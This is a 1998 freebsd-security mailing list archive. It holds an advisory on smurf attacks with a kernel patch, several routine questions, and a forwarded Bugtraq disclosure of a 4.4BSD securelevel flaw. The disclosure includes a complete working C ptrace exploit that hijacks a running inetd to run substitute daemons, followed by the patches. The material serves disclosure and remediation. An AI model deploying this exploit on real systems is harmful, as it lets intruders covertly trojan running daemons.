(193.101.72.4) with smtp id m0yjR7N-000LySC; Tue, 9 Jun 98 18:19 MET DST Received: by never.never.mind.de (linux Smail3.1.28.1 #1) id m0yjR7J-000ExzC; Tue, 9 Jun 98 18:19 MET DST Received: (from ripley@localhost) by nortobor.nostromo.in-berlin.de (8.8.7/8.8.7) id MAA03104; Tue, 9 Jun 1998 12:55:35 +0200 (CEST) (envelope-from ripley) Message-ID: <19980609125534.52896@nostromo.in-berlin.de> Date: Tue, 9 Jun 1998 12:55:34 +0200 From: "H. Eckert" To: freebsd-security@FreeBSD.ORG Subject: Re: wtf? References: Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit X-Mailer: Mutt 0.84e In-Reply-To: ; from Stunt Pope on Mon, Jun 08, 1998 at 11:22:31AM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, Jun 08, 1998 at 11:22:31AM -0400, Stunt Pope wrote: > I've got about 60 messages this morning from addresses like: > 155925184@ms23.hinet.net > and subjects: 7787008^ø`^ì^?^ð^*^ä^ú,^ð > > I'd say it was an alternate char set or something? But the fact that > the gibberesh in from and subj. changes each time makes it almost look > like a mailbomb. If you've looked at the readable part of the message containing a URL you would've seen a .tw domain. Conclusion: This was written in chinese. Apart from that I'd call it flood-spam. Greetings, Ripley (who was lucky and only got 16) -- http://www.in-berlin.de/User/nostromo/ == "You don't say what kind of CD drive or hard disks you have, but since it is causing you trouble I'll assume it is IDE." -- comp.unix.bsd.freebsd.misc To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Tue Jun 9 12:03:41 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id MAA10439 for freebsd-security-outgoing; Tue, 9 Jun 1998 12:03:41 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from easeway.com (ns1.easeway.com [209.69.71.100]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id MAA10341; Tue, 9 Jun 1998 12:03:15 -0700 (PDT) (envelope-from mwlucas@easeway.com) Received: (from mwlucas@localhost) by easeway.com (8.8.7/8.8.5) id OAA19268; Tue, 9 Jun 1998 14:54:50 -0400 (EDT) Message-Id: <199806091854.OAA19268@easeway.com> Subject: S/Key library location? To: freebsd-questions@FreeBSD.ORG Date: Tue, 9 Jun 1998 14:54:50 -0400 (EDT) Cc: freebsd-security@FreeBSD.ORG From: mwlucas@exceptionet.com X-Mailer: ELM [version 2.4ME+ PL32 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello, I'm trying to compile fwtk's auth server to use S/Key. The Makefile wants to know the location of the S/Key libraries, however. After much hunting, I can't find them. Does FreeBSD have an S/Key library directory, or am I missing something? Any thoughts on how I can get this to work? Thanks, Michael To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Tue Jun 9 13:23:28 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id NAA25738 for freebsd-security-outgoing; Tue, 9 Jun 1998 13:23:28 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from echonyc.com (echonyc.com [198.67.15.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id NAA25709; Tue, 9 Jun 1998 13:23:10 -0700 (PDT) (envelope-from benedict@echonyc.com) Received: from localhost (benedict@localhost) by echonyc.com (8.8.7/8.8.7) with SMTP id QAA20346; Tue, 9 Jun 1998 16:22:53 -0400 (EDT) Date: Tue, 9 Jun 1998 16:22:52 -0400 (EDT) From: Snob Art Genre Reply-To: ben@rosengart.com To: mwlucas@exceptionet.com cc: freebsd-questions@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: S/Key library location? In-Reply-To: <199806091854.OAA19268@easeway.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 9 Jun 1998 mwlucas@exceptionet.com wrote: > After much hunting, I can't find them. Does FreeBSD have an S/Key library > directory, or am I missing something? Any thoughts on how I can get this > to work? ben% locate libskey /usr/lib/libskey.a /usr/lib/libskey.so.2.0 *snip* ben% locate libopie /usr/lib/libopie.a /usr/lib/libopie.so.2.0 *snip* Ben "You have your mind on computers, it seems." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Wed Jun 10 11:34:58 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id LAA09536 for freebsd-security-outgoing; Wed, 10 Jun 1998 11:34:58 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from gvr.gvr.org (guido@gvr.gvr.org [194.151.74.97]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id LAA09374; Wed, 10 Jun 1998 11:34:27 -0700 (PDT) (envelope-from security-officer@freebsd.org) Received: (from guido@localhost) by gvr.gvr.org (8.8.8/8.8.5) id UAA25954; Wed, 10 Jun 1998 20:34:21 +0200 (MET DST) Date: Wed, 10 Jun 1998 20:34:21 +0200 (MET DST) Message-Id: <199806101834.UAA25954@gvr.gvr.org> From: FreeBSD Security Officer Subject: FreeBSD Security Advisory: FreeBSD-SA-98:06.icmp Reply-To: security-officer@FreeBSD.ORG To: undisclosed-recipients:; Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-98:06 Security Advisory FreeBSD, Inc. Topic: smurf attack Category: core Module: kernel Announced: 1998-06-10 Affects: FreeBSD 2.2.*, FreeBSD-stable and FreeBSD-current before 1998/05/26 suffer from this problem. Corrected: FreeBSD-current as of 1998/05/26 FreeBSD-stable as of 1998/05/26 FreeBSD only: yes Patches: ftp://ftp.freebsd.org/pub/FreeBSD/CERT/patches/SA-98:06/ ============================================================================= IMPORTANT MESSAGE: The FreeBSD security officer now uses the policy ftp://ftp.freebsd.org/pub/FreeBSD/POLICY.asc for sending out advisories. ============================================================================= I. Background As can be read in CERT advisory CA-98.01.smurf, there exists a denial of service attack called "smurfing". This attack sends ICMP echo requests to the broadcast address of a network. This results in the source address of the ICMP packets being flooded with ICMP echo replies. Of course, the source address is spoofed. II. Problem Description A solution at the intermediate network being abused to generate the ICMP echo replies is to either block ICMP echo requests directed to a broadcast address or to configure the hosts on that network not to respond to such an ICMP request. In the CERT advisory, the following was reported: In FreeBSD 2.2.5 and up, the tcp/ip stack does not respond to ICMP echo requests destined for broadcast and multicast addresses by default. This behavior can be changed via the sysctl command via mib net.inet.icmp.bmcastecho. Unfortunately, an error was made with the implementation of this functionality and, despite the text in the CERT advisory, the net.inet.icmp.bmcastecho sysctl variable default is to respond to ICMP packets sent to the networks broadcast address. You should explicitly run the command sysctl -w net.inet.icmp.bmcastecho=0 to disable this. III. Impact Your network can suffer performance degradation when a large amount of spoofed ICMP is sent to your broadcast address. IV. Workaround Block ICMP echo requests to broadcast addresses in your kernel using ipfw(8). See CERT advisory CA-98.01.smurf for more workarounds. V. Solution Apply the following patch: Patch for 3.0-current, 2.2-stable, 2.2.5 and 2.2.6 systems: Index: ip_icmp.c =================================================================== RCS file: /home/cvsup/freebsd/CVS/src/sys/netinet/ip_icmp.c,v retrieving revision 1.29 retrieving revision 1.30 diff -u -r1.29 -r1.30 --- ip_icmp.c 1997/08/25 16:29:27 1.29 +++ ip_icmp.c 1998/05/26 11:34:30 1.30 @@ -375,8 +375,7 @@ case ICMP_ECHO: if (!icmpbmcastecho - && (m->m_flags & (M_MCAST | M_BCAST)) != 0 - && IN_MULTICAST(ntohl(ip->ip_dst.s_addr))) { + && (m->m_flags & (M_MCAST | M_BCAST)) != 0) { icmpstat.icps_bmcastecho++; break; } @@ -385,8 +384,7 @@ case ICMP_TSTAMP: if (!icmpbmcastecho - && (m->m_flags & (M_MCAST | M_BCAST)) != 0 - && IN_MULTICAST(ntohl(ip->ip_dst.s_addr))) { + && (m->m_flags & (M_MCAST | M_BCAST)) != 0) { icmpstat.icps_bmcasttstamp++; break; } ============================================================================= FreeBSD, Inc. Web Site: http://www.freebsd.org/ Confidential contacts: security-officer@freebsd.org Security notifications: security-notifications@freebsd.org Security public discussion: freebsd-security@freebsd.org PGP Key: ftp://ftp.freebsd.org/pub/FreeBSD/CERT/public_key.asc Notice: Any patches in this document may not apply cleanly due to modifications caused by digital signature or mailer software. Please reference the URL listed at the top of this document for original copies of all patches if necessary. ============================================================================= -----BEGIN PGP SIGNATURE----- Version: 2.6.3ia Charset: noconv iQCVAwUBNX7QUlUuHi5z0oilAQEBMQP6Avlv1dEMtH7thC510f17to9UNcDAobz4 83Fd5qVfwjBy5G0AxSLOLYb4/9ZI137aNtsLRcvx3J4CRGPBCpA7UXptID/QuTHO 6Z0sqix21OAigcrdX0Aegx2JBvY+NLgBSK4NrWbpp5sAjjW1i4OS/wzGQmhXFDjU JGoIZMmYKXU= =VFXs -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Thu Jun 11 13:31:42 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id NAA20249 for freebsd-security-outgoing; Thu, 11 Jun 1998 13:31:42 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from stage1.thirdage.com (stage1.ThirdAge.com [204.74.82.151]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id NAA20208 for ; Thu, 11 Jun 1998 13:31:30 -0700 (PDT) (envelope-from jal@ThirdAge.com) Received: from goober (gigi.ThirdAge.com [204.74.82.169]) by stage1.thirdage.com (8.8.5/8.8.5) with SMTP id NAA06200; Thu, 11 Jun 1998 13:27:14 -0700 (PDT) Message-Id: <3.0.5.32.19980611132840.00926c20@204.74.82.151> X-Sender: jal@204.74.82.151 X-Mailer: QUALCOMM Windows Eudora Pro Version 3.0.5 (32) Date: Thu, 11 Jun 1998 13:28:40 -0700 To: njs3@doc.ic.ac.uk (Niall Smart), jbryant@unix.tfs.net From: Jamie Lawrence Subject: Re: [Fwd: Secure Ping 1.0] Cc: freebsd-security@FreeBSD.ORG In-Reply-To: References: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 09:19 PM 6/11/98 +0100, Niall Smart wrote: >Well, this exactly the sort of thing I'm talking about, except I make it >more flexible, for example it would nice to be able to specify "allow >8 megabytes outgoing traffic per day, a peak of 4 megabytes per hour, >and a limit of 2 megabytes per day to any given host except xyz.com". I don't think it would do much of anything to curb nasty practices on the net, except for limiting the relatively unsophisticated types who, say, use flood.c against spam sites and quake servers. Exactly the type of user I tend to use a rather more course grained resource limit on, and kick them off my system. These limits will probably only annoy legitimate users and make the weasels use more source routed attacks, WinGate style attacks, etc. -j To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Thu Jun 11 14:30:44 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA04708 for freebsd-security-outgoing; Thu, 11 Jun 1998 14:30:44 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from heron.doc.ic.ac.uk (ISqFY5/yNq0mWxSu7sdxT/wY8Y2KUMAW@heron.doc.ic.ac.uk [146.169.46.3]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id OAA04470 for ; Thu, 11 Jun 1998 14:29:50 -0700 (PDT) (envelope-from njs3@doc.ic.ac.uk) Received: from oak71.doc.ic.ac.uk [146.169.46.71] ([O9/sdSAjHnq0A8ZuP0n2DnUCp0jQ10vd]) by heron.doc.ic.ac.uk with smtp (Exim 1.62 #3) id 0ykEui-0005yj-00; Thu, 11 Jun 1998 22:29:40 +0100 Received: from njs3 by oak71.doc.ic.ac.uk with local (Exim 1.62 #3) id 0ykEuh-0004oj-00; Thu, 11 Jun 1998 22:29:39 +0100 From: njs3@doc.ic.ac.uk (Niall Smart) Date: Thu, 11 Jun 1998 22:29:39 +0100 In-Reply-To: Jamie Lawrence "Re: [Fwd: Secure Ping 1.0]" (Jun 11, 1:28pm) X-Mailer: Mail User's Shell (7.2.5 10/14/92) To: Jamie Lawrence , njs3@doc.ic.ac.uk (Niall Smart), jbryant@unix.tfs.net Subject: Re: [Fwd: Secure Ping 1.0] Cc: freebsd-security@FreeBSD.ORG Message-Id: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Jun 11, 1:28pm, Jamie Lawrence wrote: } Subject: Re: [Fwd: Secure Ping 1.0] > At 09:19 PM 6/11/98 +0100, Niall Smart wrote: > > >Well, this exactly the sort of thing I'm talking about, except I make it > >more flexible, for example it would nice to be able to specify "allow > >8 megabytes outgoing traffic per day, a peak of 4 megabytes per hour, > >and a limit of 2 megabytes per day to any given host except xyz.com". > > I don't think it would do much of anything to curb nasty practices > on the net, except for limiting the relatively unsophisticated types > who, say, use flood.c against spam sites and quake servers. > > Exactly the type of user I tend to use a rather more course grained > resource limit on, and kick them off my system. :) Yes, resource limitation is no panacea, the main goal of the idea is for ISP's to ration bandwith among their customers, and secondly to stop these kind of idiots from doing too much damage before you boot them off. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Thu Jun 11 14:58:28 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA10110 for freebsd-security-outgoing; Thu, 11 Jun 1998 14:58:28 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from stage1.thirdage.com (stage1.ThirdAge.com [204.74.82.151]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id OAA10069 for ; Thu, 11 Jun 1998 14:58:18 -0700 (PDT) (envelope-from jal@ThirdAge.com) Received: from goober (gigi.ThirdAge.com [204.74.82.169]) by stage1.thirdage.com (8.8.5/8.8.5) with SMTP id OAA08600; Thu, 11 Jun 1998 14:54:08 -0700 (PDT) Message-Id: <3.0.5.32.19980611145535.00cd74e0@204.74.82.151> X-Sender: jal@204.74.82.151 X-Mailer: QUALCOMM Windows Eudora Pro Version 3.0.5 (32) Date: Thu, 11 Jun 1998 14:55:35 -0700 To: njs3@doc.ic.ac.uk (Niall Smart), jbryant@unix.tfs.net From: Jamie Lawrence Subject: Re: [Fwd: Secure Ping 1.0] Cc: freebsd-security@FreeBSD.ORG In-Reply-To: References: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 10:29 PM 6/11/98 +0100, Niall Smart wrote: >On Jun 11, 1:28pm, Jamie Lawrence wrote: >> I don't think it would do much of anything to curb nasty practices >> on the net, except for limiting the relatively unsophisticated types >> who, say, use flood.c against spam sites and quake servers. >> >> Exactly the type of user I tend to use a rather more course grained >> resource limit on, and kick them off my system. > >:) Yes, resource limitation is no panacea, the main goal of the idea is >for ISP's to ration bandwith among their customers, and secondly to stop >these kind of idiots from doing too much damage before you boot them off. Definitely useful for that. I tend to forget about ISP dilemmas... If implemented, I'd suggest a soft-limit to warn people that their telnet sessions are about to stop responding, etc. -j To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Thu Jun 11 16:32:29 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id QAA29492 for freebsd-security-outgoing; Thu, 11 Jun 1998 16:32:29 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from burka.rdy.com (dima@burka.rdy.com [205.149.163.30]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id QAA29426 for ; Thu, 11 Jun 1998 16:32:07 -0700 (PDT) (envelope-from dima@burka.rdy.com) Received: (from dima@localhost) by burka.rdy.com (8.8.8/RDY&DVV) id QAA14202 for security@freebsd.org; Thu, 11 Jun 1998 16:32:05 -0700 (PDT) Message-Id: <199806112332.QAA14202@burka.rdy.com> Subject: Vulnerability in 4.4BSD Secure Levels Implementation (fwd) To: security@FreeBSD.ORG Date: Thu, 11 Jun 1998 16:32:05 -0700 (PDT) X-Class: Fast Organization: HackerDome Reply-To: dima@best.net From: dima@best.net (Dima Ruban) X-Mailer: ELM [version 2.4ME+ PL40 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Is it already fixed in -current and -stable? If not, when is it gonna be fixed? ----- Forwarded message from Niall Smart ----- >From burka.rdy.com!NETSPACE.ORG!owner-bugtraq Thu Jun 11 15:37:13 1998 Approved-By: aleph1@DFW.NET X-Mailer: Mail User's Shell (7.2.5 10/14/92) Message-ID: Date: Wed, 10 Jun 1998 22:50:35 +0100 Reply-To: Niall Smart Sender: Bugtraq List From: Niall Smart Subject: Vulnerability in 4.4BSD Secure Levels Implementation To: BUGTRAQ@NETSPACE.ORG Vulnerability in 4.4BSD Secure Levels Implementation Synopsis ======== 4.4BSD introduced the concept of "secure levels" which are intended to allow the system administrator to protect the kernel and system files from modification by intruders. When the system is running in secure mode file flags can be used to indicate that anyone, even the superuser, should be prevented from deleting or modifying the file, or that write access should be restricted to append-only. In addition device files such as /dev/kmem and those for disk devices are only available for read access. This protection is not intended to prevent system compromise, but instead is a damage limitation measure -- by preventing intruders who have compromised the root account from deleting logs of the intrusion or planting "trojan horses" their ability to hide their presence on the system or covertly gather sensitive information is reduced. We have discovered a vulnerability in all current implementations of secure levels which allow an intruder to modify the memory image of running processes, thereby bypassing the protection applied to system binaries and their configuration files. The vulnerability cannot be exploited to modify the init process, kernel memory or the protected files themselves. Details ======= The ptrace(2) system call can be used to modify the memory image of another process. It is typically used by debuggers and other similar utilities. Due to inadequate checking, it is possible to use ptrace(2) to modify the memory image of processes which have been loaded from a file which has the immutable flags set. As mentioned, this does not apply to the init process. This vulnerability is significant in that it allows an intruder to covertly modify running processes. The correct behaviour is to make the address space of these processes immutable. Although an intruder can still kill them and start others in their place, the death of system daemons will (should) draw attention on secure systems. An example exploit and patches are appended. Niall Smart, njs3@doc.ic.ac.uk. cstone, abc@ralph.ml.org. Exploit ======= There are a variety of daemons which an intruder would wish to trojan, inetd being one of the most obvious. Once the intruder controls inetd, any network logins handled by daemons started by inetd are completely under the control of the intruder. Other important daemons which are likely to be attacked include sshd, crond, syslogd, and getty. Here we present sample code which shows how to use ptrace(2) to attach to and control a running inetd and so that it starts daemons which we choose instead of those specified in inetd.conf. For the sake of explanation we will use the FreeBSD version of inetd compiled with debugging symbols. If you look at the inetd source you will see that it uses an array of struct servtab which represents the services specified in inetd.conf. The se_server member of struct servtab specifies the path to the server which handles requests for the service. When inetd accepts a new connection it searches this array for the appropriate entry, stores a pointer to the entry in the variable sep and then forks, the child then fiddles with file descriptors and execs the server. The fork happens on line 490 of inetd.c, we insert a breakpoint at this instruction and when we hit it modify the se_server member of the struct servtab which sep points to. We then insert another breakpoint later in the code which only the parent process will execute and continue, when we hit that breakpoint we change the se_server back to what it was. Meanwhile, the child process continues and executes whatever server we have told it to. # gdb --quiet ./inetd (gdb) list 489,491 489 } 490 pid = fork(); 491 } (gdb) break 490 Breakpoint 2 at 0x1f76: file inetd.c, line 490. (gdb) p &sep Address requested for identifier "sep" which is in a register. (gdb) p sep $1 = (struct servtab *) 0x1 (gdb) info reg eax 0x0 0 ecx 0xefbfda50 -272639408 edx 0x2008bf48 537444168 ebx 0xefbfda90 -272639344 esp 0xefbfd968 0xefbfd968 ebp 0xefbfda68 0xefbfda68 esi 0x1 1 edi 0x0 0 eip 0x1914 0x1914 eflags 0x246 582 cs 0x1f 31 ss 0x27 39 ds 0x27 39 es 0x27 39 (gdb) So, the first breakpoint address is at 0x1F76, and the sep variable has been placed in the register %esi which makes writing the exploit a bit easier. After the fork we want to stop the parent process only, inserting a breakpoint at line 502 will achieve that: (gdb) list 501,503 501 if (pid) 502 addchild(sep, pid); 503 sigsetmask(0L); (gdb) break 502 Breakpoint 1 at 0x1fc8: file inetd.c, line 502. Line 502 corresponds to the instruction at 0x1FC8. Finally, we will need some unused memory to write in the string for our replacement daemon, for this we can simply overwrite the code that performs the option processing: (gdb) break 325 Breakpoint 2 at 0x1a9a: file inetd.c, line 325. We take 64 bytes from 0x1A9A. Here is the exploit, the first three arguments specify the first and second breakpoints and the address of the spare memory and the last is the pid of the inetd to attach to. [ Note to script kiddies: you need root on the system first ] #include #include #include #include #include #include #include #include #include #include #if defined(__FreeBSD__) #define SE_SERVER_OFF 44 #elsif defined(__OpenBSD__) #define SE_SERVER_OFF 48 #endif #define INSN_TRAP 0xCC #define ARRSIZE(x) (sizeof(x) / sizeof((x)[0])) #define Ptrace(req, pid, addr, data) _Ptrace(req, #req, pid, (caddr_t) addr, data) void sig_handler(int unused); sig_atomic_t finish = 0; int pid; int _Ptrace(int req, const char* reqname, pid_t pid, caddr_t addr, int data) { int ret = ptrace(req, pid, addr, data); if (ret < 0 && errno != 0) { fprintf(stderr, "ptrace %s: %s\n", reqname, strerror(errno)); exit(EXIT_FAILURE); } /* this shouldn't be necessary */ #ifdef __FreeBSD__ if (req == PT_DETACH) kill(pid, SIGCONT); #endif return ret; } void sig_handler(int unused) { /* we send the child a hopelessly harmful signal to break outselves * out of ptrace */ finish = 1; kill(pid, SIGINFO); } struct replace { char* old; char* new; }; int main(int argc, char** argv) { struct reg regs; int insn; int svinsn; caddr_t breakaddr; caddr_t oldaddr; caddr_t spareaddr; caddr_t addr; caddr_t nextaddr; caddr_t contaddr; char buf[64]; char* ptr; struct replace* rep; struct replace replace[] = { { "/bin/cat", "/bin/echo" } }; if (argc != 5) { fprintf(stderr, "usage: %s \n", argv[0]); exit(EXIT_FAILURE); } breakaddr = (caddr_t) strtoul(argv[1], 0, 0); nextaddr = (caddr_t) strtoul(argv[2], 0, 0); spareaddr = (caddr_t) strtoul(argv[3], 0, 0); pid = atoi(argv[4]); signal(SIGINT, sig_handler); signal(SIGTERM, sig_handler); signal(SIGQUIT, sig_handler); /* * attach her up */ Ptrace(PT_ATTACH, pid, 0, 0); wait(0); Ptrace(PT_GETREGS, pid, ®s, 0); printf("%%esp = %#x\n", regs.r_esp); printf("%%ebp = %#x\n", regs.r_ebp); printf("%%eip = %#x\n", regs.r_eip); contaddr = (caddr_t) 1; while (1) { /* * replace the lowest byte of the dw at the specified address * with a breakpoint insn */ svinsn = Ptrace(PT_READ_D, pid, breakaddr, 0); insn = (svinsn & ~0xFF) | INSN_TRAP; Ptrace(PT_WRITE_D, pid, breakaddr, insn); printf("%x ==> %x @ %#x\n", svinsn, insn, (int) breakaddr); /* continue till we hit the breakpoint */ Ptrace(PT_CONTINUE, pid, contaddr, 0); do { /* FreeBSD reports signals twice, it shouldn't do that */ int sig; int status; wait(&status); sig = WSTOPSIG(status); printf("process received signal %d (%s)\n", sig, sys_siglist[sig]); if (finish) goto detach; if (sig == SIGTRAP) break; Ptrace(PT_CONTINUE, pid, 1, WSTOPSIG(status)); } while(1); Ptrace(PT_GETREGS, pid, ®s, 0); printf("hit breakpoint at %#x\n", (int) regs.r_eip - 1); /* copy out the pathname of the daemon it's trying to run */ oldaddr = (caddr_t) Ptrace(PT_READ_D, pid, regs.r_esi + SE_SERVER_OFF, 0); for (ptr = buf, addr = oldaddr; ptr < &buf[ARRSIZE(buf)]; ptr += 4, addr += 4) *(int*)ptr = Ptrace(PT_READ_D, pid, addr, 0); printf("daemon path ==> %s @ %#x\n", buf, (int)oldaddr); /* check if we want to substitute our own */ for (rep = replace; rep < &replace[ARRSIZE(replace)] || (rep = 0); rep++) if (!strcmp(rep->old, buf)) { printf("%s ==> %s\n", rep->old, rep->new); break; } /* copy the substitute pathname to some unused location */ if (rep != 0) { strcpy(buf, rep->new); for (ptr = buf, addr = spareaddr; ptr < &buf[sizeof(buf)]; ptr += 4, addr += 4) Ptrace(PT_WRITE_D, pid, addr, *(int*)ptr); Ptrace(PT_WRITE_D, pid, regs.r_esi + SE_SERVER_OFF, (int) spareaddr); } /* * replace the original instruction, set a breakpoint on the next * instruction we want to break in and then reset the daemon path, * and remove the last breakpoint. We could just single step over * the for syscall but all the crap involved in calling a fn in a * dll makes it easier to just to set a breakpoint on the next * instruction and wait till we hit that */ Ptrace(PT_WRITE_D, pid, breakaddr, svinsn); svinsn = Ptrace(PT_READ_D, pid, nextaddr, 0); insn = (svinsn & ~0xFF) | INSN_TRAP; Ptrace(PT_WRITE_D, pid, nextaddr, insn); Ptrace(PT_CONTINUE, pid, breakaddr, 0); wait(0); Ptrace(PT_GETREGS, pid, ®s, 0); printf("stepped instruction to %#x\n", regs.r_eip); Ptrace(PT_WRITE_D, pid, nextaddr, svinsn); contaddr = nextaddr; /* put back the original path */ if (rep != 0) Ptrace(PT_WRITE_D, pid, regs.r_esi + SE_SERVER_OFF, (int) oldaddr); } detach: printf("detaching\n"); Ptrace(PT_WRITE_D, pid, breakaddr, svinsn); Ptrace(PT_DETACH, pid, 1, 0); return 0; } So, lets try it out: # cat inetd.conf afs3-fileserver stream tcp nowait root /bin/cat cat /root/inetd.conf # telnet localhost 7000 Trying 127.0.0.1... Connected to localhost Escape character is '^]'. afs3-fileserver stream tcp nowait root /bin/cat cat /root/inetd.conf Connection closed by foreign host. # ps -aux | grep inetd root 1233 0.0 0.9 204 556 ?? SXs 11:41AM 0:00.02 ./inetd /root/inetd.conf # ./ptrace 0x1F76 0x1FC8 0x1A9A 1233 >/dev/null 2>&1 & [1] 1267 # telnet localhost 7000 Trying 127.0.0.1... Connected to localhost Escape character is '^]'. /root/inetd.conf Connection closed by foreign host. # Affected ======== BSD/OS, FreeBSD, NetBSD, OpenBSD. Patches ======= OpenBSD patched this problem yesterday. The following patches apply to FreeBSD-current and will apply to FreeBSD-stable with some tweaking of the line numbers. --- kern/sys_process.c Mon Jun 8 11:47:03 1998 +++ kern/sys_process.c Mon Jun 8 11:49:53 1998 @@ -37,6 +37,7 @@ #include #include #include +#include #include #include @@ -208,6 +209,7 @@ struct proc *p; struct iovec iov; struct uio uio; + struct vattr va; int error = 0; int write; int s; @@ -246,6 +248,11 @@ /* can't trace init when securelevel > 0 */ if (securelevel > 0 && p->p_pid == 1) return EPERM; + + if((error = VOP_GETATTR(p->p_textvp, &va, p->p_ucred, p)) != 0) + return(error); + if(va.va_flags & (IMMUTABLE|NOUNLINK)) + return(EPERM); /* OK */ break; --- kern/kern_exec.c Sun Jun 7 17:23:14 1998 +++ kern/kern_exec.c Tue Jun 9 14:08:10 1998 @@ -655,6 +655,8 @@ error = VOP_GETATTR(vp, attr, p->p_ucred, p); if (error) return (error); + if((p->p_flag & P_TRACED) && (attr.va_flags & (IMMUTABLE|NOUNLINK))) + return (EACCES); /* * 1) Check if file execution is disabled for the filesystem that this --- miscfs/procfs/procfs_vnops.c Tue May 19 09:15:00 1998 +++ miscfs/procfs/procfs_vnops.c Wed Jun 10 16:23:33 1998 @@ -129,6 +129,8 @@ { struct pfsnode *pfs = VTOPFS(ap->a_vp); struct proc *p1, *p2; + int error; + struct vattr va; p2 = PFIND(pfs->pfs_pid); if (p2 == NULL) @@ -144,6 +146,12 @@ if (!CHECKIO(p1, p2) && !procfs_kmemaccess(p1)) return (EPERM); + + error = VOP_GETATTR(p2->p_textvp, &va, p1->p_ucred, p1); + if(error) + return(error); + if(va.va_flags & IMMUTABLE) + return(EPERM); if (ap->a_mode & FWRITE) pfs->pfs_flags = ap->a_mode & (FWRITE|O_EXCL); ----- End of forwarded message from Niall Smart ----- -- dima To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Thu Jun 11 20:29:32 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id UAA17596 for freebsd-security-outgoing; Thu, 11 Jun 1998 20:29:32 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from burka.rdy.com (dima@burka.rdy.com [205.149.163.30]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id UAA17554 for ; Thu, 11 Jun 1998 20:28:50 -0700 (PDT) (envelope-from dima@burka.rdy.com) Received: (from dima@localhost) by burka.rdy.com (8.8.8/RDY&DVV) id UAA15476 for security@freebsd.org; Thu, 11 Jun 1998 20:28:50 -0700 (PDT) Received: from flea.best.net (root@flea.best.net [206.184.139.131]) by burka.rdy.com (8.8.8/RDY&DVV) with ESMTP id TAA15035 for ; Thu, 11 Jun 1998 19:06:15 -0700 (PDT) Received: from brimstone.netspace.org (brimstone.netspace.org [128.148.157.143]) by flea.best.net (8.8.8/8.7.3) with ESMTP id TAA06914 for ; Thu, 11 Jun 1998 19:05:23 -0700 (PDT) Received: from unknown@netspace.org (port 41264 [128.148.157.6]) by brimstone.netspace.org with ESMTP id <97196-18385>; Thu, 11 Jun 1998 22:04:59 -0400 Received: from NETSPACE.ORG by NETSPACE.ORG (LISTSERV-TCP/IP release 1.8c) with spool id 1172543 for BUGTRAQ@NETSPACE.ORG; Thu, 11 Jun 1998 22:02:17 -0400 Received: from brimstone.netspace.org (brimstone.netspace.org [128.148.157.143]) by netspace.org (8.8.7/8.8.7) with ESMTP id VAA15075 for ; Thu, 11 Jun 1998 21:51:41 -0400 Received: from 